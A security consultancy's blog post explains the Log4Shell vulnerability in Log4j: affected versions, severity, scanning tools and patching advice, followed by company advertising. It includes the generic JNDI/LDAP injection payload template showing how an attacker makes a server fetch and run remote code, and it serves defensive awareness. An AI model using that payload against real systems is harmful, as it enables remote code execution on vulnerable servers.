What Is Log4Shell The Log4j Vulnerability Explained
Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, involving arbitrary code execution. The vulnerability has existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud’s security team on 24 November 2021, and was publicly disclosed on 9 December 2021
Log4j is a Java-based logging utility that is part of the Apache Logging Services. Log4j is one of the several Java logging frameworks which is popularly used by millions of Java applications on the internet.
Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit is simple to execute and is estimated to affect hundreds of millions of devices.
This allows attackers to:
If a device that is connected to the internet runs Apache Log4j, versions 2.0-to-2.14.1, then they are vulnerable to Log4Shell.
Vulnerability Type Remote Code Execution
Severity Critical
Base CVSS Score 10.0
Versions Affected All versions from 2.0-beta9 to 2.14.1
Log4j Vulnerability Detection:
There are certain tools to scan the packages for the presence of Log4j vulnerability. They are as follows.
Log4j Detect is a free CLI tool that quickly scans your projects to find vulnerable Log4j versions containing the following known CVEs:
It provides the exact path to direct and indirect dependencies, along with the fixed version for speedy remediation.
In addition, this tool will search for vulnerable files with the .jar,.gem extensions.
Additional Log4j RCE Scanners:
An attacker who can control log messages or log messages parameters can execute arbitrary code on the vulnerable server loaded from LDAP servers when message lookup substitution is enabled. As a result, an attacker can craft a special request that would make the utility remotely downloaded and execute the payload.
Below is the most common example of it using the combination of JNDI and LDAP:
${jndi:ldap://<host>:<port>/<payload>}
The vendor has released a fix and the customers are advised to update their Log4j to version 2.16.0 an above, if updating the version is possible. This advice and the following methods help mitigate the impacts of vulnerability:
The best fix against these vulnerabilities is to patch log4j to 2.16.0 and above:
Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
Read More Articles About Cyber Security
In this blog post, we’ve briefly explained what is Log4Shell is, why the vulnerability is important, how it can be exploited, and some remediation advice to protect ourselves against this vulnerability. Also, we shared some useful tools, all of which are capable of scanning and detecting the vulnerability. We hope you enjoyed it! Stay safe from cyber-attacks!
Detox Technologies is an ISO 27001-2013 certified Global Consultation and Implementation company, Headquartered in derbyshire UK & R&D Center in Delhi. We believe in precision and quality above everything else.
We are the trusted standard for companies and individuals acquiring services to protect their brands, businesses and dignity from baffling Cyber-attacks. We provide end to end cyber security solutions to our clients.
Our thrust on securing the People-Process-Technology has enabled us to offer impenetrable security to our clients across the world. Our success stories are translated in the form of positive testimonials from our growing list of clients.
For More Info About—- Cyber Security Consulting
Call Now—+91 9711761704, +91 9289014236
Address:—Detox Technologies, Pinnacle Tower, G-06, Ground Floor, Block A, Industrial Area, Sector-62, Noida 201309
Ransomware attacks have emerged as one of the most challenging cybersecurity threats facing businesses today. With attackers constantly evolving their…
In the realm of Cybersecurity, vulnerability scanning tools play a pivotal role in identifying and addressing potential weaknesses within an…
Dark web monitoring serves as a critical component within the broader spectrum of cybersecurity solutions, playing a proactive role in…
In the fast-paced digital landscape of today, mobile applications have become an integral part of our lives. From social networking…
In the ever-evolving landscape of cybersecurity, penetration testing plays a crucial role in identifying vulnerabilities within an organization's systems and…
Understanding VAPT (Vulnerability Assessment and Penetration Testing) Vulnerability Assessment and Penetration Testing (VAPT) is a proactive approach to security evaluation.…